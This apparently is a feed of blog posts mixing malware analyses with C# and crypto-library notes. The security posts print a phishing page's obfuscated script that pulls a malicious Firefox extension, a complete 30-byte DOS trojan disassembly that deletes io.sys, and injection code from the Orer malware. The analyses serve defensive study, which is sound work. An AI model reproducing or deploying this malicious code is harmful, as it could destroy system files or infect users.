[MALWARE] Bank Of America Virus!!

Warning: This post contains Malware, pay attention!!!!

The site hxxp://bankofamerica.ulmb.com/do.php?cmd=SignIn (spreaded with Spam Mail) contains a Malware, not explicitly linked.
I’ve used Malzilla to inspect URL content, a suspicious message appears:

Browser Update Required!

This web site uses functions which is not compatible with your current browser version To update your browser please install the requiredupdate to view this page.

Very strange, that no checks about the compatibility are performed before this message, so let’s inspect further..

<script type=”text/javascript”>

var myf_1 = 60;
…
var myf_10 = “1”;
var myf_11 = “82SSN573-38NN-482N-99NQ-91S697O91631”;
var myf_12 = “uggc://jjj.svyr2lbh.arg/nccyrg.pno”;

These two strings seems to be Obfuscated Links , let’s see the rest of the Evil Code, have a function dc(str), that decodes with an easy algorithm (ROT-13 Encryption) an encrypted string, next we have a function install_ff_result() and function install_ff_ext() that installates FireFox Extension.

Now the extension file is taken from a supect source, file2you, a bit poor for Banks of America, you don’t think? 🙂

So let’s see what are the obfuscated links:

hxxp://www.file2you.net/{censored against lamah}.cab

and

hxxp://www.file2you.net/{censored or lamah}.xpi

Both these links contains the same Malware.

In the next post, i’ll report what this Malware FF Extension does..

See you to the next post 🙂

KMDF’s NTSTATUS Return Values

Frequently happens that, KMDF Functions returns strange status values, that can’t be founded into NtStatus.h, this causes to Newbie KMDF Coders some confusion, the solution is easy, just take a look at \inc\wdf\kmdf\10\wdfstatus.h 😉

See you to the next post 🙂

[Malware] Trojan.DOS.DelIosys.b

This morning I’ve received between the classic Spam, a little attachment that contains an old Virus, so I’ve dissected It:

seg000:0100 mov ax, 4301h
seg000:0103 mov dx, 114h
seg000:0106 mov cx, 6
seg000:0109 int 21h ; DOS – 2+ – SET FILE ATTRIBUTES
seg000:0109 ; DS:DX -> ASCIZ file name
seg000:0109 ; CX = file attribute bits
seg000:010B jb short locret_10113
seg000:010D mov ah, 41h
seg000:010F int 21h ; DOS – 2+ – DELETE A FILE (UNLINK)
seg000:010F ; DS:DX -> ASCIZ pathname of file to delete
seg000:0111 jb short $+2
seg000:0113 retn
seg000:0113 start endp

The file is a little COM executable for MS-DOS, which uses two elementary interrupt’s calls, one for Attributes Settings and another for File Deletion (ASCIZ pathname in this case points to io.sys System’s file).

This malware, is identified by the major antivirus as Trojan.DOS.DelIosys.b

File Size: 30 Bytes

MD5 Hash: ff0a232cf3720c75c88552a52d9ea72f

SHA1 Hash: 68e3bdf93f88bf2ff0c2a1e4ca96ddb190ab9835

It’s incredible how old Viruses are still around the web!

See you to the next post 🙂

BouncyCastle Experiment Good Results #2

Good news from my BouncyCastle Crypto Libs.

I’ve just finished the MultiHasher Experiment, cause a lack of documentation I wasn’t sure of I/O functions but Peter Dettman clarified me something:

for the Byte encoding of the string, could be used the Classical Encoder class of System.ComponentModel, in this way:

InputBuffer = Encod.GetBytes(YourString);

Is used UTF8Encoding instead of ASCII Encoding:

textBox1.Text = Encod.GetString(Hex.Encode(outBuffer));

See you to the next post 🙂

[VirtualBox] Xp Installation Problems

Today I’ve installed an Xp VM powered by VirtualBox, but initially I’ve encountered a problem that blocked the installation.

As indicated by VBox i’ve choised 192 MB for VM’s Memory, but at the step of NTFS Formattation VBox shuts down with the following error:

HostMemoryLow

So I setted the memory at 125 MB and installation worked fine.

Remember don’t believe to the Indicated Memory Usage 😉

See you to the next post 🙂

First Experiments with BouncyCastle CryptoLib

In these day I’m experimentig a promising library which implements many Crypto Algorithms, called BouncyCastle (which is for .NET, and I’m coding in C#).

Library, seems to be complete and to have good implementations of Common Algorithms, EllipticCurveCryptography, Certifications, OpenPGP, OpenSSL.

A part a little leak of performances in ECIES algorithm, seems to work great.

The big problem is that Hex Conversion functions have some problem, for example Hex.Decode() , fails when the string passed have an odd lenght.

To dayI’ve sent an email to the coders, hope in a fast reply, if i discover how to solve also other minor problems (actually no time to mention all) i’ll post here the fixed piece of code 😉

See you to the next post 🙂

Attacking MultiCore CPUs

Recently was published an intersting Security Flaw and realtu  for MultiCore CPUs, here you can find a generic Overview, and here a more Detailed descryption of the Vulnerability 🙂

See you to the next post! 🙂

News & Links

In these days I’ve searched informations about USB C# Classes and Libraries, because Low Level I/O informations, into .NET is a bit difficult to find, here there are some links that could interest you 😉

SharpUSBLib

USBWirelessSecurity

DeviceIOControl & USB Using Managed C++ and C#

USB HID

See you to the next post 🙂

Orer.exe Reverse Code Engineering #2

After many time from the second promised part, here the continuation of Orer’s Reverse Code Engineering.

At the Entry Point we have the injected, malicious code, in form of call, so let’s study this call:

010460D0        CALL orer.010460D5 ; Malicious Code Entry Point

010460D5        POP EBX

010460D6        SUB EBX,401005

...

010460EA       CALL orer.010461F7 ;Scan for 'MZ'

010460EF       MOV EBP,EAX ; In EAX the Executable memory address

010460F1       POP EAX

010460F2       PUSH EBP ;Put Exec address in stack

010460F3       PUSH 4014BD ; Empty Location

010460F8       PUSH 402711 ; Empty Location2

...

0104610B      PUSH EAX

0104610C      PUSH A5171D00

01046111      PUSH EBP      ;Exec Address

01046112      CALL orer.0104618D

01046117      OR EAX,EAX

01046119      JE orer.0104658D ;Go_Out

0104611F      PUSH 40

0104611F      PUSH 40

01046121      PUSH 1000

01046126      PUSH 1D95

0104612B      PUSH 0

0104612D      CALL EAX ;VirtualAlloc

01046137       MOV EDI,EAX

01046139       LEA EDX,DWORD PTR DS:[EBX+40114C] ;0104621c (ORER)

...

01046143      ADD EDX,1000

01046149      CALL orer.010461F7  ;Search_Loaded_Exec

0104614E     ADD EAX,DWORD PTR DS:[EAX+3C] ;(01000000 - is Explorer)

...

01046183     POP EBX

01046184     POP EAX

01046185     LEA ECX,DWORD PTR DS:[EAX+234]

0104618B    JMP ECX ;007E0234

Last Jump redirects code execution to Orer’s Main Thread, so here the Main Thread Code:

0840239      POP EDX   ; 00840239 (Not every time the same address, obviously)

0084023A    SUB EDX,401239

00840240     XCHG EDX,EBX

00840242     PUSHAD

00840243     LEA ESI,DWORD PTR DS:[EBX+402741]

00840249     LEA EDI,DWORD PTR DS:[EBX+402875]

...

0084026C    PUSH EAX

0084026D    PUSH EBP

0084026E    CALL 008400BD ;Obtain Functions

00840273    STOS DWORD PTR ES:[EDI] ;Function's Address is contained in EAX

00840274    CMP DWORD PTR DS:[ESI],0

00840277    LOOPDNE SHORT 0084024F

00840279    POPAD

0084027A   OR EDX,EDX

0084027C  JE SHORT 0084029A

The most intersing thing in this piece of code, is the IT Building, here the Imported Functions:

CreateFileA,GetFileAttrib, SetFileAttrib, MapViewOfFile, UnMapViewOfFile, GetFileSize, SetFileTime, GetFileType, CloseHandle, GetProcAddress, VirtualFree, GetTickCount, GetWindowDirectory, GetModuleFileName, GetTempPAthW, DeleteFileW/A, MoveFile,CopyFile, WriteFile,VirtualAlloc, VirtualProtect,Sleep, GetDriveType, CreateProcessW, WinExec, GetCurrentProcess, CreateToolHelp32Snapshot, Process32First, Process32Next,OpenProcess, SetFilePointer

Third part will be completed in a few days 🙂

Unified C# 3.0 Specification

The authoritative C# 3.0 Specification was written by the people who created and implemented the C# language. This 500 plus page document is now available for Download

See you to the next post 🙂